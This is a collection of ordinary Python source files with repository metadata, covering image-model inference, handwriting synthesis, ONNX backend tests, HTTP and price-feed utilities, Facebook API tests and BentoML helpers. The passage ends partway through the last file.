0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 10
|
2019-10-26T23:56:47.000Z
|
2021-09-03T13:06:53.000Z
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 24
|
2019-10-25T06:36:30.000Z
|
2022-02-10T15:07:46.000Z
|
from .base_model import BaseModel
from . import networks
from .guided_pix2pix_model import GuidedPix2PixModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = GuidedPix2PixModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert(not opt.isTrain)
BaseModel.initialize(self, opt)
self.opt = opt
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(input_nc=opt.input_nc, guide_nc=opt.guide_nc, output_nc=opt.output_nc, ngf=opt.ngf, netG=opt.netG, n_layers=opt.n_layers,
norm=opt.norm, init_type=opt.init_type, init_gain=opt.init_gain, gpu_ids=self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.guide = input['guide'].to(self.device)
def forward(self):
self.fake_B = self.netG(self.real_A, self.guide)
def get_output(self):
return self.fake_B
| 37.44898
| 159
| 0.66158
|
4a145edd915b7a499af61168c6f903f6bccd5a98
| 6,830
|
py
|
Python
|
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
trdg/handwritten_text_generator.py
|
nicolasmetallo/TextRecognitionDataGenerator
|
deb260f96d4421039273582d709e24b6bbf8da16
|
[
"MIT"
] | null | null | null |
import os
import pickle
import numpy as np
import random as rnd
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.mlab as mlab
import seaborn
from PIL import Image, ImageColor
from collections import namedtuple
def download_model_weights():
from pathlib import Path
import urllib.request
cwd = os.path.dirname(os.path.abspath(__file__))
for k in ['model-29.data-00000-of-00001','model-29.index','model-29.meta','translation.pkl']:
download_dir = Path(cwd)/'handwritten_model/'
download_dir.mkdir(exist_ok=True,parents=True)
if (download_dir/f'{k}').exists(): continue
print(f'file {k} not found, downloading from git repo..')
urllib.request.urlretrieve(
f'https://raw.github.com/Belval/TextRecognitionDataGenerator/master/trdg/handwritten_model/{k}',
download_dir/f'{k}')
print(f'file {k} saved to disk')
return cwd
def _sample(e, mu1, mu2, std1, std2, rho):
cov = np.array([[std1 * std1, std1 * std2 * rho], [std1 * std2 * rho, std2 * std2]])
mean = np.array([mu1, mu2])
x, y = np.random.multivariate_normal(mean, cov)
end = np.random.binomial(1, e)
return np.array([x, y, end])
def _split_strokes(points):
points = np.array(points)
strokes = []
b = 0
for e in range(len(points)):
if points[e, 2] == 1.0:
strokes += [points[b : e + 1, :2].copy()]
b = e + 1
return strokes
def _cumsum(points):
sums = np.cumsum(points[:, :2], axis=0)
return np.concatenate([sums, points[:, 2:]], axis=1)
def _sample_text(sess, args_text, translation):
# Original creator said it helps (https://github.com/Grzego/handwriting-generation/issues/3)
args_text += " "
fields = [
"coordinates",
"sequence",
"bias",
"e",
"pi",
"mu1",
"mu2",
"std1",
"std2",
"rho",
"window",
"kappa",
"phi",
"finish",
"zero_states",
]
vs = namedtuple("Params", fields)(*[tf.compat.v1.get_collection(name)[0] for name in fields])
text = np.array([translation.get(c, 0) for c in args_text])
sequence = np.eye(len(translation), dtype=np.float32)[text]
sequence = np.expand_dims(
np.concatenate([sequence, np.zeros((1, len(translation)))]), axis=0
)
coord = np.array([0.0, 0.0, 1.0])
coords = [coord]
phi_data, window_data, kappa_data, stroke_data = [], [], [], []
sess.run(vs.zero_states)
for s in range(1, 60 * len(args_text) + 1):
e, pi, mu1, mu2, std1, std2, rho, finish, phi, window, kappa = sess.run(
[
vs.e,
vs.pi,
vs.mu1,
vs.mu2,
vs.std1,
vs.std2,
vs.rho,
vs.finish,
vs.phi,
vs.window,
vs.kappa,
],
feed_dict={
vs.coordinates: coord[None, None, ...],
vs.sequence: sequence,
vs.bias: 1.0,
},
)
phi_data += [phi[0, :]]
window_data += [window[0, :]]
kappa_data += [kappa[0, :]]
# ---
g = np.random.choice(np.arange(pi.shape[1]), p=pi[0])
coord = _sample(
e[0, 0], mu1[0, g], mu2[0, g], std1[0, g], std2[0, g], rho[0, g]
)
coords += [coord]
stroke_data += [
[mu1[0, g], mu2[0, g], std1[0, g], std2[0, g], rho[0, g], coord[2]]
]
if finish[0, 0] > 0.8:
break
coords = np.array(coords)
coords[-1, 2] = 1.0
return phi_data, window_data, kappa_data, stroke_data, coords
def _crop_white_borders(image):
image_data = np.asarray(image)
grey_image_data = np.asarray(image.convert("L"))
non_empty_columns = np.where(grey_image_data.min(axis=0) < 255)[0]
non_empty_rows = np.where(grey_image_data.min(axis=1) < 255)[0]
cropBox = (
min(non_empty_rows),
max(non_empty_rows),
min(non_empty_columns),
max(non_empty_columns),
)
image_data_new = image_data[
cropBox[0] : cropBox[1] + 1, cropBox[2] : cropBox[3] + 1, :
]
return Image.fromarray(image_data_new)
def _join_images(images):
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths) - 35 * len(images)
max_height = max(heights)
compound_image = Image.new("RGBA", (total_width, max_height))
x_offset = 0
for im in images:
compound_image.paste(im, (x_offset, 0))
x_offset += im.size[0] - 35
return compound_image
def generate(text, text_color):
cd = download_model_weights()
with open(os.path.join(cd, os.path.join("handwritten_model", "translation.pkl")), "rb") as file:
translation = pickle.load(file)
config = tf.compat.v1.ConfigProto(device_count={"GPU": 0})
tf.compat.v1.reset_default_graph()
with tf.compat.v1.Session(config=config) as sess:
saver = tf.compat.v1.train.import_meta_graph(os.path.join(cd,"handwritten_model/model-29.meta"))
saver.restore(sess,os.path.join(cd,os.path.join("handwritten_model/model-29")))
images = []
colors = [ImageColor.getrgb(c) for c in text_color.split(",")]
c1, c2 = colors[0], colors[-1]
color = "#{:02x}{:02x}{:02x}".format(
rnd.randint(min(c1[0], c2[0]), max(c1[0], c2[0])),
rnd.randint(min(c1[1], c2[1]), max(c1[1], c2[1])),
rnd.randint(min(c1[2], c2[2]), max(c1[2], c2[2])),
)
for word in text.split(" "):
_, window_data, kappa_data, stroke_data, coords = _sample_text(
sess, word, translation
)
strokes = np.array(stroke_data)
strokes[:, :2] = np.cumsum(strokes[:, :2], axis=0)
_, maxx = np.min(strokes[:, 0]), np.max(strokes[:, 0])
miny, maxy = np.min(strokes[:, 1]), np.max(strokes[:, 1])
fig, ax = plt.subplots(1, 1)
fig.patch.set_visible(False)
ax.axis("off")
for stroke in _split_strokes(_cumsum(np.array(coords))):
plt.plot(stroke[:, 0], -stroke[:, 1], color=color)
fig.patch.set_alpha(0)
fig.patch.set_facecolor("none")
canvas = plt.get_current_fig_manager().canvas
canvas.draw()
s, (width, height) = canvas.print_to_buffer()
image = Image.frombytes(
"RGBA", (width, height), s
)
mask = Image.new("RGB", (width, height), (0, 0, 0))
images.append(_crop_white_borders(image))
plt.close()
return _join_images(images), mask
| 31.330275
| 109
| 0.55549
|
4a146072aeb281d1d5a665fe6c86c6529a74cf81
| 2,777
|
py
|
Python
|
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
pdfmaker/parser_n77.py
|
bmcmenamin/sundries
|
b41a52da5efab0c67013fb25b080753449571d93
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import json
from bs4 import BeautifulSoup
from docx import Document
from docx.enum.text import WD_ALIGN_PARAGRAPH
import re
from num2words import num2words
scraped_file = "heart_of_obsidian.json"
output_file = "heart_of_obsidian.docx"
chapter_re = re.compile(r"[\s]*Chapter [\d]+", re.IGNORECASE)
def is_chapter_head(para):
if chapter_re.match(para):
return int(para.split()[1])
def to_center(para):
return para == "* * *"
bad_phrases = {}
scraped_file = "reaver.json"
output_file = "reaver.docx"
possible_chapters = {
num2words(c, ordinal=False, lang='en', to='cardinal'): c
for c in range(1, 100)
}
def is_chapter_head(para):
key = para.lower().strip().replace(" ", "-")
return possible_chapters.get(key)
def to_center(para):
return para == "* * *"
bad_phrases = {}
with open(scraped_file, "rt") as file:
html_pages = json.load(file)
max_pages = max(int(k) for k in html_pages)
full_book = []
for page_num in range(1, max_pages + 1):
parsed_page = BeautifulSoup(html_pages[str(page_num)])
para_text = []
for chap_content in parsed_page.findAll("div", {"class": "chapter-content"}):
lines = [
line.rstrip()
for p in chap_content.find_all('p')
for line in p.get_text().strip().splitlines()
]
para_text += [l for l in lines if l]
for p in para_text:
if any(bp in p for bp in bad_phrases):
print("Dropping para:\n", p)
else:
full_book.append(p)
with open("test.txt", "wt") as file:
file.write("\n".join(full_book))
# Parse into chapters
chapter_broken_book = defaultdict(lambda: [])
chap = None
for para in full_book:
possible_chap = is_chapter_head(para)
if possible_chap:
chap = possible_chap
chapter_broken_book[chap].append(para.strip())
else:
chapter_broken_book[chap].append(para)
# Write into Docx
book = Document()
# Start with pre-chapter 1
chapter_paras = chapter_broken_book[None]
book.add_heading(chapter_paras[0], level=1)
for p in chapter_paras[1:]:
para = book.add_paragraph(p.strip())
para.alignment = WD_ALIGN_PARAGRAPH.LEFT
if to_center(p):
para.alignment = WD_ALIGN_PARAGRAPH.CENTER
book.add_page_break()
# Go through chapters in order
chapters = sorted(k for k in chapter_broken_book if k)
for chap in chapters:
chapter_paras = chapter_broken_book[chap]
book.add_heading(chapter_paras[0], level=2)
for p in chapter_paras[1:]:
para = book.add_paragraph(p.strip())
para.alignment = WD_ALIGN_PARAGRAPH.LEFT
if to_center(p):
para.alignment = WD_ALIGN_PARAGRAPH.CENTER
book.add_page_break()
book.save(output_file)
| 22.950413
| 81
| 0.670148
|
4a1460c755dd4caedb2afb52a663c0989ae9050b
| 4,709
|
py
|
Python
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
chccc1994/openvino
|
41f7893ae81d186d15c1754b179bf32a66d03bcf
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""
ONNX Backend implementation.
See ONNX documentation for details:
https://github.com/onnx/onnx/blob/master/docs/Implementing%20an%20ONNX%20backend.md
"""
from typing import Any, Dict, List, Optional, Sequence, Text, Tuple
import numpy
import onnx
from onnx.backend.base import Backend, BackendRep
from onnx.helper import make_graph, make_model, make_tensor_value_info
from openvino import Function
from tests.runtime import get_runtime
from tests.test_onnx.utils.onnx_helpers import import_onnx_model, np_dtype_to_tensor_type
class OpenVinoOnnxBackendRep(BackendRep):
def __init__(self, ng_model_function, device="CPU"): # type: (List[Function], str) -> None
super().__init__()
self.device = device
self.ng_model_function = ng_model_function
self.runtime = get_runtime()
self.computation = self.runtime.computation(ng_model_function)
def run(self, inputs, **kwargs): # type: (Any, **Any) -> Tuple[Any, ...]
"""Run computation on model."""
return self.computation(*inputs)
class OpenVinoOnnxBackend(Backend):
@classmethod
def is_compatible(
cls,
model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> bool
# Return whether the model is compatible with the backend.
try:
import_onnx_model(model)
return True
except Exception:
return False
@classmethod
def prepare(
cls,
onnx_model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> OpenVinoOnnxBackendRep
super().prepare(onnx_model, device, **kwargs)
ng_model_function = import_onnx_model(onnx_model)
return OpenVinoOnnxBackendRep(ng_model_function, device)
@classmethod
def run_model(
cls,
model, # type: onnx.ModelProto
inputs, # type: Any
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> Tuple[Any, ...]
return cls.prepare(model, device, **kwargs).run(inputs)
@classmethod
def run_node(
cls,
node, # type: onnx.NodeProto
inputs, # type: Any
device="CPU", # type: Text
outputs_info=None, # type: Optional[Sequence[Tuple[numpy.dtype, Tuple[int, ...]]]]
**kwargs # type: Dict[Text, Any]
): # type: (...) -> Optional[Tuple[Any, ...]]
"""Prepare and run a computation on an ONNX node."""
# default values for input/output tensors
input_tensor_types = [np_dtype_to_tensor_type(node_input.dtype) for node_input in inputs]
output_tensor_types = [onnx.TensorProto.FLOAT for idx in range(len(node.output))]
output_tensor_shapes = [()] # type: List[Tuple[int, ...]]
if outputs_info is not None:
output_tensor_types = [
np_dtype_to_tensor_type(dtype) for (dtype, shape) in outputs_info
]
output_tensor_shapes = [shape for (dtype, shape) in outputs_info]
input_tensors = [
make_tensor_value_info(name, tensor_type, value.shape)
for name, value, tensor_type in zip(node.input, inputs, input_tensor_types)
]
output_tensors = [
make_tensor_value_info(name, tensor_type, shape)
for name, shape, tensor_type in zip(
node.output, output_tensor_shapes, output_tensor_types
)
]
graph = make_graph([node], "compute_graph", input_tensors, output_tensors)
model = make_model(graph, producer_name="OpenVinoOnnxBackend")
if "opset_version" in kwargs:
model.opset_import[0].version = kwargs["opset_version"]
return cls.prepare(model, device).run(inputs)
@classmethod
def supports_device(cls, device): # type: (Text) -> bool
"""Check whether the backend is compiled with particular device support.
In particular it's used in the testing suite.
"""
return device != "CUDA"
class OpenVinoTestBackend(OpenVinoOnnxBackend):
@classmethod
def is_compatible(
cls,
model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> bool
# Return whether the model is compatible with the backend.
import_onnx_model(model)
return True
prepare = OpenVinoOnnxBackend.prepare
run_model = OpenVinoOnnxBackend.run_model
run_node = OpenVinoOnnxBackend.run_node
supports_device = OpenVinoOnnxBackend.supports_device
| 34.625
| 97
| 0.641113
|
4a1460e96a744b1e6a0ba14abccc4189388f9679
| 1,826
|
py
|
Python
|
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | 1
|
2021-11-14T16:22:52.000Z
|
2021-11-14T16:22:52.000Z
|
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | null | null | null |
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | null | null | null |
import json
from .utils import HTTP_STATUS_CODES
class HTTPResponse:
"""A basic HTTP Response, allows to set custom status_codes and content_types for special requests."""
def __init__(
self,
data: object = None,
status_code: int = 200,
content_type: str = "application/json",
):
"""Constructor for a HTTP Response.
Args:
data (object, optional): The data object, if content_type is application/json, this needs to be parsable. If not it needs a string representation. Defaults to None.
status_code (int, optional): The status code to be sent to the user. Defaults to 200.
content_type (str, optional): The content type to be sent to the user. Defaults to "application/json".
Raises:
Exception: If the status_code is unknown.
"""
if status_code not in HTTP_STATUS_CODES:
raise Exception("status_code {} not known!".format(status_code))
self.data = data
self.status_code = status_code
self.content_type = content_type
def to_HTTP(self) -> str:
"""Generates a HTTP compatible string to be sent to the client.
Returns:
str: The HTTP string.
"""
if self.data:
if self.content_type is "application/json":
data = json.dumps(self.data)
else:
data = str(self.data)
else:
data = ""
http = "HTTP/1.1 {} {}\r\n".format(
self.status_code, HTTP_STATUS_CODES[self.status_code]
)
http += "Content-Type: {}\r\n".format(self.content_type)
if data:
http += "Content-Length: {}\r\n".format(len(data))
http += "Connection: close\r\n\r\n"
http += data
return http
| 32.607143
| 176
| 0.589814
|
4a14611e72efda1bf3552637bc751b682b6d116e
| 8,103
|
py
|
Python
|
python/utils.py
|
verc/trustless-liquidity-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | 1
|
2021-01-04T14:38:18.000Z
|
2021-01-04T14:38:18.000Z
|
python/utils.py
|
verc/nu-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | null | null | null |
python/utils.py
|
verc/nu-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | 3
|
2018-09-23T15:33:04.000Z
|
2021-06-20T14:34:56.000Z
|
#! /usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2015 creon (creon.nu@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
import threading
import urllib2
import urllib
import json
import logging
import httplib
import thread
import socket
import time
nulllogger = logging.getLogger('null')
nulllogger.addHandler(logging.NullHandler())
nulllogger.propagate = False
class Connection():
def __init__(self, server, logger = None):
self.server = server
self.logger = logger
if not logger:
self.logger = logging.getLogger('null')
def json_request(self, request, method, params, headers, trials = None, timeout = 5):
while True:
curtime = time.time()
connection = httplib.HTTPConnection(self.server, timeout = timeout)
try:
connection.request(request, method, urllib.urlencode(params), headers = headers)
response = connection.getresponse()
content = response.read()
return json.loads(content)
except httplib.BadStatusLine:
msg = 'server could not be reached'
except ValueError:
msg = 'server response invalid'
except socket.error, v:
msg = 'socket error (%s)' % str(v[0])
if str(v[0]) == 'timed out':
timeout = min(timeout + 5, 30)
except:
msg = 'unknown connection error'
if trials:
if trials <= 1:
self.logger.debug("%s: %s", method, msg)
return { 'message' : msg, 'code' : -1, 'error' : True }
trials = trials - 1
self.logger.debug("%s: %s, retrying in 5 seconds with timeout %d...", method, msg, timeout)
time.sleep(max(5.0 - time.time() + curtime, 0))
def get(self, method, params = None, trials = None, timeout = 5):
if not params: params = {}
return self.json_request('GET', '/' + method, params, {}, trials, timeout)
def post(self, method, params = None, trials = None, timeout = 5):
if not params: params = {}
headers = { "Content-type": "application/x-www-form-urlencoded" }
return self.json_request('POST', '/' + method, params, headers, trials, timeout)
class ConnectionThread(threading.Thread):
def __init__(self, conn, logger = None):
threading.Thread.__init__(self)
self.daemon = True
self.active = True
self.pause = False
self.logger = logger
self.logger = logger if logger else logging.getLogger('null')
self.conn = conn
def stop(self):
self.active = False
def acquire_lock(self): pass
def release_lock(self): pass
class CheckpointThread(ConnectionThread):
def __init__(self, host, logger = None):
super(CheckpointThread, self).__init__(Connection(host, logger), logger)
self.users = []
self.lock = threading.Lock()
self.trigger = threading.Lock()
self.trigger.acquire()
self.checkpoint = { 'error' : 'no checkpoint received' }
self.start()
def collect(self, timeout):
self.timeout = timeout
try: self.trigger.release()
except thread.error: pass
def finish(self):
try:
self.lock.acquire()
self.lock.release()
except KeyboardInterrupt:
raise
return self.checkpoint
def register(self, address, key, name):
self.users.append(key)
self.conn.post('register', { 'address' : address, 'key' : key, 'name' : name }, trials = 3, timeout = 10)
def run(self):
while self.active:
self.trigger.acquire()
self.lock.acquire()
starttime = time.time()
while time.time() < starttime + self.timeout > 0:
self.checkpoint = self.conn.post('checkpoints', { u : 1 for u in self.users }, trials = 1, timeout = 1)
if 'error' in self.checkpoint:
time.sleep(0.1)
self.logger.error('unable to retrieve checkpoint from %s: %s', self.conn.server, self.checkpoint['error'])
else:
break
self.lock.release()
class PriceFeed():
def __init__(self, update_interval, logger):
self.update_interval = update_interval
self.feed = { x : [0, threading.Lock(), 0.0] for x in [ 'btc', 'eur', 'cny' ] }
self.logger = logger if logger else logging.getLogger('null')
def price(self, unit, force = False):
if unit == 'usd' or unit == 'nbt': return 1.0 #AlwaysADollar
if not unit in self.feed: return None
self.feed[unit][1].acquire()
curtime = time.time()
if force or curtime - self.feed[unit][0] > self.update_interval:
self.feed[unit][0] = curtime
#self.feed[unit][2] = None
if unit == 'btc':
try: # bitfinex
ret = json.loads(urllib2.urlopen(urllib2.Request('https://api.bitfinex.com/v1//pubticker/btcusd'), timeout = 3).read())
self.feed['btc'][2] = 1.0 / float(ret['mid'])
except:
self.logger.warning("unable to update BTC price from bitfinex")
try: # coinbase
ret = json.loads(urllib2.urlopen(urllib2.Request('https://coinbase.com/api/v1/prices/spot_rate?currency=USD'), timeout = 3).read())
self.feed['btc'][2] = 1.0 / float(ret['amount'])
except:
self.logger.warning("unable to update BTC price from coinbase")
try: # bitstamp
ret = json.loads(urllib2.urlopen(urllib2.Request('https://www.bitstamp.net/api/ticker/'), timeout = 3).read())
self.feed['btc'][2] = 2.0 / (float(ret['ask']) + float(ret['bid']))
except:
self.logger.error("unable to update price for BTC")
elif unit == 'eur':
try: # yahoo
ret = json.loads(urllib2.urlopen(urllib2.Request('http://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json'), timeout = 3).read())
for res in ret['list']['resources']:
if res['resource']['fields']['name'] == 'USD/EUR':
self.feed['eur'][2] = float(res['resource']['fields']['price'])
except:
self.logger.warning("unable to update EUR price from yahoo")
try: # bitstamp
ret = json.loads(urllib2.urlopen(urllib2.Request('https://www.bitstamp.net/api/eur_usd/'), timeout = 3).read())
self.feed['eur'][2] = 2.0 / (float(ret['sell']) + float(ret['buy']))
except:
self.logger.error("unable to update price for EUR")
elif unit == 'cny':
try: # yahoo
ret = json.loads(urllib2.urlopen(urllib2.Request('http://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json'), timeout = 3).read())
for res in ret['list']['resources']:
if res['resource']['fields']['name'] == 'USD/CNY':
self.feed['cny'][2] = float(res['resource']['fields']['price'])
except:
self.logger.warning("unable to update CNY price from yahoo")
try: # coindesk
ret = json.loads(urllib2.urlopen(urllib2.Request('https://api.coindesk.com/v1/bpi/currentprice/CNY.json'), timeout = 3).read())
self.feed['cny'][2] = ret['bpi']['CNY']['rate'] / ret['bpi']['USD']['rate']
except:
self.logger.error("unable to update price for CNY")
self.feed[unit][1].release()
return self.feed[unit][2]
| 40.515
| 162
| 0.640257
|
4a1461568dce72047bfc5633431f67883116fc32
| 1,372
|
py
|
Python
|
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Module Template
--------------------
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
# some debugging
_debug = 0
_log = ModuleLogger(globals())
@bacpypes_debugging
def setup_module():
if _debug: setup_module._debug("setup_module")
@bacpypes_debugging
def teardown_module():
if _debug: teardown_module._debug("teardown_module")
@bacpypes_debugging
def setup_function(function):
if _debug: setup_function._debug("setup_function %r", function)
@bacpypes_debugging
def teardown_function(function):
if _debug: teardown_function._debug("teardown_function %r", function)
@bacpypes_debugging
class TestCaseTemplate(unittest.TestCase):
@classmethod
def setup_class(cls):
if _debug: TestCaseTemplate._debug("setup_class")
@classmethod
def teardown_class(cls):
if _debug: TestCaseTemplate._debug("teardown_class")
def setup_method(self, method):
if _debug: TestCaseTemplate._debug("setup_module %r", method)
def teardown_method(self, method):
if _debug: TestCaseTemplate._debug("teardown_method %r", method)
def test_something(self):
if _debug: TestCaseTemplate._debug("test_something")
def test_something_else(self):
if _debug: TestCaseTemplate._debug("test_something_else")
| 22.866667
| 73
| 0.727405
|
4a1461f7747adae3ff11bf3c5ba1a59e236fb320
| 2,480
|
py
|
Python
|
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | null | null | null |
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | null | null | null |
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | 1
|
2021-06-02T07:15:35.000Z
|
2021-06-02T07:15:35.000Z
|
import json
import unittest
import responses
from six import iteritems
import pyfacebook
class CommentTestApi(unittest.TestCase):
BASE_PATH = "testdata/facebook/apidata/pictures/"
BASE_URL = "https://graph.facebook.com/{}/".format(pyfacebook.Api.VALID_API_VERSIONS[-1])
with open(BASE_PATH + "single_picture.json", "rb") as f:
SINGLE_PICTURE = json.loads(f.read().decode("utf-8"))
with open(BASE_PATH + "multi_pictures.json", "rb") as f:
MULTI_PICTURE = json.loads(f.read().decode("utf-8"))
def setUp(self):
self.api = pyfacebook.Api(
app_id="123456", app_secret="secret",
long_term_token="token"
)
def testGetPictureInfo(self):
page_id = "2121008874780932"
with self.assertRaises(pyfacebook.PyFacebookException):
self.api.get_picture(page_id=page_id, pic_type="not")
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + page_id + "/picture", json=self.SINGLE_PICTURE)
picture = self.api.get_picture(
page_id=page_id,
)
self.assertEqual(picture.height, 200)
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + page_id + "/picture", json=self.SINGLE_PICTURE)
picture = self.api.get_picture(
page_id=page_id, pic_type="large",
return_json=True
)
self.assertEqual(picture["height"], 200)
def testGetPictures(self):
ids = ["2121008874780932", "20531316728"]
with self.assertRaises(pyfacebook.PyFacebookException):
self.api.get_pictures(ids=ids, pic_type="not")
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + "picture", json=self.MULTI_PICTURE)
picture_dict = self.api.get_pictures(
ids=ids
)
for _id, data in iteritems(picture_dict):
self.assertIn(_id, ids)
self.assertEqual(200, data.height)
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + "picture", json=self.MULTI_PICTURE)
picture_dict = self.api.get_pictures(
ids=ids,
pic_type="large",
return_json=True
)
for _id, data in iteritems(picture_dict):
self.assertIn(_id, ids)
self.assertEqual(200, data["height"])
| 32.631579
| 93
| 0.594758
|
4a146224eeea7f942aec628db5d234c5140d609a
| 6,461
|
py
|
Python
|
bentoml/_internal/utils/__init__.py
|
SAB-6/BentoML
|
d16d3dc75d75a8da300b47a15493ca53f51baabd
|
[
"Apache-2.0"
] | 1
|
2022-02-13T05:35:47.000Z
|
2022-02-13T05:35:47.000Z
|
bentoml/_internal/utils/__init__.py
|
khuyentran1401/BentoML
|
06973901fd04d115eab862956ba26732644dcd52
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/utils/__init__.py
|
khuyentran1401/BentoML
|
06973901fd04d115eab862956ba26732644dcd52
|
[
"Apache-2.0"
] | null | null | null |
import os
import uuid
import socket
import typing as t
import functools
import contextlib
from typing import TYPE_CHECKING
from pathlib import Path
import fs
import fs.copy
from ..types import PathType
from .lazy_loader import LazyLoader
if TYPE_CHECKING:
from fs import FS
C = t.TypeVar("C")
T = t.TypeVar("T")
_T_co = t.TypeVar("_T_co", covariant=True, bound=t.Any)
__all__ = [
"cached_property",
"cached_contextmanager",
"reserve_free_port",
"get_free_port",
"catch_exceptions",
"LazyLoader",
"validate_or_create_dir",
]
def randomize_runner_name(module_name: str):
return f"{module_name.split('.')[-1]}_{uuid.uuid4().hex[:6].lower()}"
def validate_or_create_dir(*path: PathType) -> None:
for p in path:
path_obj = Path(p)
if path_obj.exists():
if not path_obj.is_dir():
raise OSError(20, f"{path_obj} is not a directory")
else:
path_obj.mkdir(parents=True)
def calc_dir_size(path: PathType) -> int:
return sum(f.stat().st_size for f in Path(path).glob("**/*") if f.is_file())
def human_readable_size(size: int, decimal_places: int = 2) -> str:
for unit in ["B", "KiB", "MiB", "GiB", "TiB", "PiB"]:
if size < 1024.0 or unit == "PiB":
break
size /= 1024.0
return f"{size:.{decimal_places}f} {unit}"
